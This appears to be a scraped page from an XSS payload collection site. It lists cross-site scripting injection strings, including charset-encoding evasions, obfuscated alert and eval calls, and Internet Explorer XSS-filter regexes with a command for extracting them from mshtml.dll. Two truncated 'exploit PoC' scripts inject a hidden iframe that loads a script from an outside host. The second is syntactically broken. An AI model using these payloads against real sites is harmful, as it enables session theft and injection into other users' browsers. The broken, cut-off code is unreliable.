xsscx

/* Remote File Include with HTML TAGS via XSS.Cx  */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */
/* Updated September 29, 2014 */
/* RFI START */
<img language=vbs src=<b onerror=alert#1/1#>
<isindex action="javas&Tab;cript:alert(1)" type=image>
"]<img src=1 onerror=alert(1)>
<input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span>

xsscx

<meta charset=iso-2022-jp>%1B(B%1B><svg onload=alert(1)>%1B$B%1B
%20~}%22%3Cmeta%20charset=hz-gb-2312%3E%3Csvg%20onload%3Dalert%281%29%3E~{
%3Cmeta%20charset=iso-2022-jp%3E%1B(J+onfocus=alert(1)%20autofocus%3E%1B$(D%1B(
%3Cmeta+charset%3Dhz-gb-2312%3E%27~%7B%27%3C~%7D%22%20onmouseover=alert%281%29%20a=
%3Cmeta%20charset=hz-gb-2312%3E~{!~}%22%20onfocus=alert%281%29%20autofocus%3E
%1B%28J%3Cmeta%20charset%3Diso-2022-jp%3E%3Cbody%20onload=alert%281%29%3E%1B%24%40%1B

xsscx

'() {'
document.createElement('img').src='javascript:while(1){}'
'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('7')' '>'
(function(a){alert(1)}).call()
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
p'rompt(1)
"(prompt(1))in"
parseInt("prompt",36);
eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))
eval(1558153217..toString(36))(1)

xsscx

{[\"\'].*?[{,].*(((v|(\\u0076)|(\\166)|(\\x76))[^a-z0-9]*({a}|(\\u00{6}1)|(\\1{4}1)|(\\x{6}1))[^a-z0-9]*(l|(\\u006C)|(\\154)|(\\x6C))[^a-z0-9]*(u|(\\u0075)|(\\165)|(\\x75))[^a-z0-9]*(e|(\\u0065)|(\\145)|(\\x65))[^a-z0-9]*(O|(\\u004F)|(\\117)|(\\x4F))[^a-z0-9]*(f|(\\u0066)|(\\146)|(\\x66)))|((t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*({o}|(\\u00{6}F)|(\\1{5}7)|(\\x{6}F))[^a-z0-9]*(S|(\\u0053)|(\\123)|(\\x53))[^a-z0-9]*(t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*(r|(\\u0072)|(\\162)|(\\x72))[^a-z0-9]*(i|(\\u0069)|(\\151)|(\\x69))[^a-z0-9]*(n|(\\u006E)|(\\156)|(\\x6E))[^a-z0-9]*(g|(\\u0067)|(\\147)|(\\x67)))).*?:}
{<a.*?hr{e}f}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=}
{[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}}
{<[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]*=}
{<is{i}ndex[ /+\t>]}
{<fo{r}m.*?>}
{<[?]?im{p}ort[ /+\t].*?implementation[ /+\t]*=}
{<EM{B}ED[ /+\t].*?((src)|(type)).*?=}

xsscx

======================================================
IE XSS REGEX RESULTS (As of 09/2011) for IE9
======================================================
{(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(b|(&[#()\[\].]x?0*((66)|(42)|(98)|(62));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).}
{(j|(&[#()\[\].]x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)

xsscx

======================================================
IE XSS REGEX RESULTS (As of 05/2013) for IE10
======================================================
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}}
{[\"\'].*?[{,].*(((v|(\\u0076)|(\\166)|(\\x76))[^a-z0-9]*({a}|(\\u00{6}1)|(\\1{4}1)|(\\x{6}1))[^a-z0-9]*(l|(\\u006C)|(\\154)|(\\x6C))[^a-z0-9]*(u|(\\u0075)|(\\165)|(\\x75))[^a-z0-9]*(e|(\\u0065)|(\\145)|(\\x65))[^a-z0-9]*(O|(\\u004F)|(\\117)|(\\x4F))[^a-z0-9]*(f|(\\u0066)|(\\146)|(\\x66)))|((t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*({o}|(\\u00{6}F)|(\\1{5}7)|(\\x{6}F))[^a-z0-9]*(S|(\\u0053)|(\\123)|(\\
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=}
{[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}}
{<LI{N}K[ /+\t].*?href[ /+\t]*=}
{<BA{S}E[ /+\t].*?href[ /+\t]*=}
{<ME{T}A[ /+\t].*?http-equiv[ /+\t]*=}

xsscx

==============
XSS Expressions
==============
Key
==============
Operator
Injection
Reflection
==============
Addition & String Concatenation

xsscx

============================================
XSS Exploit PoC #1 - iFramer
============================================
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://xss.cx/xss.js' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');

xsscx

============================================
XSS Exploit PoC #2
============================================
function cx () {
	try {
			for (var i = 0; i < navigator.plugins.length; i++) {
			if {name.indexOf("Media Player") != -1) {
				var m = document.create.Element("iframe");
				m.setAttribute("src", http://xss.cx/xss.js:);
				m.setAttribute("width", 0);

xsscx

======================================================
Extract XSS Filters from MSHTML.DLL used in IE9
======================================================
findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll|find "{"
======================================================
IE9 Summary - 23 Hardcoded Regex in mshtml.dll
======================================================
Fixed strings (2) javascript:, vbscript:
HTML tags (14) object, applet, base, link, meta, import, embed, vmlframe, iframe, script(2), style, isindex, form
HTML attributes (3)  " datasrc, " style=, " on*= (event handlers)